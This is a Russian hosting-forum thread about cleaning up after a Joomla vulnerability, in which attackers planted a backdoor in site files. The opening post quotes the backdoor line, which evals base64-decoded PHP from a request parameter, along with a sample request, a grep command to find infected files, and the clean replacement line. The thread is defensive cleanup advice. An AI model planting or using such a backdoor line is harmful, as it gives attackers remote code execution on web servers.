Лечение последствий уязвимости Joomla

12
Electronn
На сайте с 01.02.2010
Offline
91
1194

В одной из последних уязвимостей была возможность писать произвольный код, в файлах сайтов была замечена вот такая бяка :

defined( '_JEXEC' ) or die(@eval(base64_decode($_REQUEST['c_id'])));

То есть выполнение произвольного закодированного в base64 php кода, например :

xxx.php?c_id=cGhwaW5mbygpOw== ( xxx.php?c_id=phpinfo(); )

Поиск :

из корневого каталога всех сайтов сделать греп по eval(base64_decode($_REQUEST

gep -HiR 'eval(base64_decode' /путь/до/корневого/каталога/сайтов

Лечение :

либо удаление строки, либо замена на :

defined('_JEXEC') or die('Restricted access');

ЗЫ Знаю, что многие это все понимают, но даже если пост поможет хотя бы одному человеку - значит написал не зря.

M
На сайте с 19.01.2011
Offline
65
#1

Если у злоумышленника есть возможность внедрять свой код в ваши файлы то все такие "зашиты" до одного места. На самом деле надо следить и ставить все апдеты и патчи для джомлы и всех ее модулей. ( ну а лучше не юзать джомлу вообще)

________________________ я больше не хостер ....
Electronn
На сайте с 01.02.2010
Offline
91
#2

По крайней мере надо знать, откуда руки растут.

Естественно, без должного обслуживания не поможет от взлома ничего.

SeVlad
На сайте с 03.11.2008
Offline
1609
#3

Какое отношение это имеет к техническим вопросам по ХОСТИНГУ?

Делаю хорошие сайты хорошим людям. Предпочтение коммерческим направлениям. Связь со мной через http://wp.me/P3YHjQ-3.
Electronn
На сайте с 01.02.2010
Offline
91
#4

Например начинающим хостерам, предоставляющим услуги шаред хостинга.

Решил что тема - хостинг, наиболее подходит для данной темы, и она может быть полезна не только хостерам, но и клиентам хостингов.

SeVlad
На сайте с 03.11.2008
Offline
1609
#5
Electronn:
Решил что тема - хостинг, наиболее подходит для данной темы, и она может быть полезна не только хостерам, но и клиентам хостингов.

Т.е. раздел вэбстроительство - менее подходит?

izyalex
На сайте с 06.04.2009
Offline
60
#6

ТС явно ошибся разделом

Сpanel хостинг (http://bit.ly/Vjwlfl) и ISPmanager хостинг (http://bit.ly/11NnOqJ) от 119р./мес VIP Премиум хостинг (http://bit.ly/VibYQ9) в Москве, 1000р./мес и не парюсь
Electronn
На сайте с 01.02.2010
Offline
91
#7

Если ошибся разделом - тему удалят или перенесут, не страшно.

Но санитары леса настораживают - если вам нечего добавить в тему или по теме, вы просто начинаете критиковать, а не проходите мимо ? ( это был риторический вопрос ).

удачного дня =)

Pro-host
На сайте с 06.07.2011
Offline
22
#8

А я бы не советовал ставить чмод на php, чтобы можно было редактировать.

хостинг с защитой от DDoS атак (http://pro-host.ws/)
SeVlad
На сайте с 03.11.2008
Offline
1609
#9
Electronn:
Но санитары леса настораживают - если вам нечего добавить в тему или по теме, вы просто начинаете критиковать, а не проходите мимо ?

Санитары леса подсказывают дубам, где будет больше пользы от их желудей.

А если смотреть глубже - то и закладываются семена (чтобы в след раз их размахивание ветвями принесло больше пользы).

К сожалению, как показывает практика, плодородной земли для успешного всхода семян становиться всё меньше и меньше. :( И реакция трусливого анонимуса очередное тому подтверждение.

S1
На сайте с 12.06.2007
Offline
44
#10
Pro-host:
А я бы не советовал ставить чмод на php, чтобы можно было редактировать.

Поддерживаю. По сути, права типа 777 на папки 666 на файлы - это уже атавизм того времени, когда php работал с правами юзера nobody или подобного. Думаю, сейчас такой хостинг уже днём с огнём не найти. А вот поставив такие права, Вы чаще всего открываете доступ на запись всем соседям на сервере. Если конечно хостер не позаботился и о такой ситуации заранее.

Надёжный хостинг с защитой от вирусов (http://webguard.pro/hosting) VPS хостинг (Windows, Linux, FreeBSD) (http://webguard.pro/page/vds-kvm) Удаление вирусов с сайтов (http://webguard.pro/page/udalenie-virusov-s-sajta)
12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий